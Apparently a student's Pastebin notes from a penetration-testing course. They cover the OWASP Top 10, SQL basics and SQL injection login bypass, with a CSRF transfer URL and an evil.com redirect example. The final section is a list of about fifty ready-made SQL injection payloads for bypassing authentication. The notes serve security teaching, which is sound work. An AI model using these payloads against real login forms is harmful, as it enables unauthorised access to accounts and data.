Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- VAPT
- Vulnerability Assessment Penetration Testing
- VAPT EXPERT = Vulnerability Assessment and Penetration Testing expert,
- so VULNERABILITY ASSESSMENT is a pre-hacking phase in which the intended person scans and tries to find out the security gaps or holes that make the device or software vulnerable
- Example
- ip address -> 192.168.1.55
- open ports(ports on which some application may be listening)
- Filtered ports-(Firewall protected)
- os information -is it upto date?
- Service running on ports
- PENETRATION TESTING is a phase in which the intended person actually tests out the systems by simulating attacks on the systems
- Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack like a malicious hacker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and involves active exploitation of security vulnerabilities.
- Example using Exploits for known vulnerability
- ->windows 7 Server
- ->Using exploit to exploit the server
- AT the end a proof of concept is need to be made a handed to Senior Authority
- Example
- Big banks or smart car manufacturers hire security professionals to hack into their systems ethically and they pay large sums of money to them to do that in the end of VAPT a Vapt report needs to be handed to the bank's security team
- __________________________________________________
- Owasp ->Open Web Application Security Project
- Owasp top 10
- 1. Injection
- 2. Broken Authentication and Session Management
- 3. Cross Site Scripting(XSS)
- 4. Insecure Direct Object Reference
- 5. Security Misconfiguration
- 6. Sensitive Data Exposure
- 7. Missing Function Level Access Control
- 8. Cross site request forgery
- 9. Using Known Vulnerable Components
- 10.Unvalidated Redirects and Forwards
- 1. Injection Vulnerabilities--> Sql,Commands
- Injection Attack occurs only if hacker's are able to send malicious unintended data from an application to the interpreter or say backend of the website .
- application->untrusted data->interpreter(backend)
- why this attacks occurs ->>
- This attack occurs because of improper validation-> for e.g lets take the example of a signin or signup field on a computer web application ,now when a user is trying to sign-in or sign-up
- it requires user to enter id/password in a certain manner, like there should be no special characters involved etc, You will learn about that as regular expressions
- Similarly when a developer is setting up a webapp/or application he/she need to validate all the parameter,link and domains of the website so that commands or special character dont work.
- __________________________________________________________________
- 2. Broken Authentication and Session Management
- In broken authentication or session management hackers make an attempt to steal account from another users, Attackers/hacker uses leaks and flaws in the authentication or session management Functions.
- Why this attack occurs
- ->User credentials are not protected when stored using hashing or encryption
- -
- >Credentials can be guessed or overwritten through weak management functions eg(Hacker is able to guess session id , or change password)
- ->Session id's are exposed in the url
- ->Session id's don't time out
- ->passwords,credentials,session-ids are sent over in un encrypted form
- ______________________________________________________________________
- 3. Cross Site Scripting (XSS)
- It is an attack in which hackers are able to execute javascript code on a web site, It is of three types
- ->XSS Reflected
- ->XSS Stored
- This attack can be used by hacker to execute javascript code in victim browser to hijack user sessions,deface website, insert content, etc
- Why this attack occurs
- ->Improper Validation
- ->Unsafe JavaScript API
- The pentesting of a website can easily protect form xss attacks and xss can also be found with simple code analysis.
- _______________________________________________________________________________
- 4. Insecure Direct Object Reference
- It is a vulnerability in which an attacker who is authorised to his/her own dash board is able to gain access to some other users account for
- 5.Security Misconfiguaration
- As the name is security misconfiguration what it means is imagine a webapp having admin accounts on it or just having default accounts with default passwords but having certain privledges . Now if you run a website which has default accounts configured and your website is available in the public domain. Now from an attackers perspective he/she can actually go out and try out default credentials and would be able to log in the website.
- why this attack occurs->
- ->Keeping default credentials
- ->Using a component or plugin which may have some default credentials
- e.g
- Directory listing is not disabled on your server.
- Attacker discovers she can simply list directories to find any
- file. Attacker finds and downloads all your compiled Java
- classes, which she decompiles and reverse engineers to get all
- your custom code. She then finds a serious access control
- flaw in your application
- _______________________________________________________________________
- 6.Sensitive Data Exposure
- Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion or at rest or even at customer/users browser
- eg 1
- An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.
- eg 2
- A site simply doesn’t use SSL for all authenticated pages. Attacker simply monitors network
- traffic (like an open wireless network), and steals the user’s session cookie. Attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.
- _____________________________________________________________________________
- 7. Missing Function Level Access Control
- ->It is an attack in which a hacker or an anonymous person is able able to access an application interface that it would otherwise never been able to access.
- eg www.anywebsite.com/user
- and hacker is able to access www.anywebsite.com/admin
- now if a hacker /person is able to do that it is a flaw.
- ____________________________________________________________
- 8. Cross site request Forgery.
- In this attack the hacker creates a forged http request and tricks victim into submitting that request via images tabs or xss
- The application allows a user to submit a state changing request that does not include anything secret.
- For example:
- http://anywebsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243
- this all done by making the victim click on a link or on a certain appealing image
- _______________________________________________________________
- 9. Using Components with Known Vulnerability
- In this case hacker tries to discover a weak component through scanning or manual analysis and then either finds out an exploit if already available or writes an exploit
- eg
- a website using a server which has an rce exploit
- or
- a wordpress website which has a vulnerable component and has an exploit.
- ___________________________________________________________________________________
- 10.Unvalidated Redirects and Forwards
- Attacker links to unvalidated redirects and tricks victim into clicking it,attacker targets unsafe forwards to bypass security check.
- eg http://anywebsite.com/redirect.jsp?url=evil.com
- ->->url=evil.com<-<-
- ______________________________________________________________________________________
- Introduction to DBMS
- Database
- Database is a collection of structured data set which contains all the data(important credentials,logs,etc)
- Database Management system-This data needs to be managed and it is done with help of dbms ,Dbms can also interact with user and writes user data to database.
- Database can be of two types
- SQL
- No SQL
- There are certain tables and entries in a database
- table name Member
- _________________________________________________________
- Name | ID | NUMBER | EMAIL | ADDRESS | Age |
- _________________________________________________________
- deepak|10|9123456719|deepak@yahoo.co.in|lokhandvala|26 |
- Gagan |4 |9145619237|gagan@gmail.com |Delhi |20 |
- _________________________________________________________
- Structured querries would look like
- for example
- all the people who have age less then 30
- so query would look like
- Select * from Member where age<30
- h.w perform all querries
- queries
- SELECT - extracts data from a database
- = UPDATE - updates data in a database
- = DELETE - deletes data from a database
- = INSERT INTO - inserts new data into a database
- = CREATE DATABASE - creates a new database
- = ALTER DATABASE - modifies a database
- = CREATE TABLE - creates a new table
- = ALTER TABLE - modifies a table
- = DROP TABLE - deletes a table
- = SELECT * from trainees - Select everything from table name "trainees"
- = WHERE - Showing the location of the data of the table,column etc.
- H.w Study Mongodb
- sql VS noSql
- _________________________________
- LVS Setup configuration Practical
- _________________________________
- ______________________________________________
- Sql Injection Authentication Bypass
- at the time of authentication ho kya rha hen
- Lets Imagine
- koi querry hogi -> username== 'Something' && password=='Something'
- if ham querry ko true karwade kisi Tareeke se and dbms confuse hojay to kya vo hame login dega??
- for eg username = 1' or '1' = '1
- password = 1' or '1' = '1
- or hum kya try kar sakte hen
- 0' or '0' = '0
- 2' or '2' = '2
- or
- 0' or '3' = '3
- so basically you just need to manage to make querry true and if there is improper validation you can get access
- usernmamev =hello
- password = hello1
- \
- login
- 1' or '1' = '1
- 1' or '1' = '1
- asljhdaksd??where some where username='1' or '1' = '1' & password ='1' or '1' = '1'lajbnd,fsnfkns.d
- ___________________________________________
- or 1=1
- or 1=1--
- or 1=1#
- or 1=1/*
- admin' --
- admin' #
- admin'/*
- admin' or '1'='1
- admin' or '1'='1'--
- admin' or '1'='1'#
- admin' or '1'='1'/*
- admin'or 1=1 or ''='
- admin' or 1=1
- admin' or 1=1--
- admin' or 1=1#
- admin' or 1=1/*
- admin') or ('1'='1
- admin') or ('1'='1'--
- admin') or ('1'='1'#
- admin') or ('1'='1'/*
- admin') or '1'='1
- admin') or '1'='1'--
- admin') or '1'='1'#
- admin') or '1'='1'/*
- 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
- admin" --
- admin" #
- admin"/*
- admin" or "1"="1
- admin" or "1"="1"--
- admin" or "1"="1"#
- admin" or "1"="1"/*
- admin"or 1=1 or ""="
- admin" or 1=1
- admin" or 1=1--
- admin" or 1=1#
- admin" or 1=1/*
- admin") or ("1"="1
- admin") or ("1"="1"--
- admin") or ("1"="1"#
- admin") or ("1"="1"/*
- admin") or "1"="1
- admin") or "1"="1"--
- admin") or "1"="1"#
- admin") or "1"="1"/*
- 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
- ----------------
- get method
- post method
- www.hisbank.com/transferfuntosunil's_account?amouunt=500000
- website.com
- username='something'
- password='something'
- login
- username='something'
- password='something'
- 1' or '1' = '1
- jghvhjdajshdgsd where username='1' or '1' = '1' and password='1' or '1' = '1'e87
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement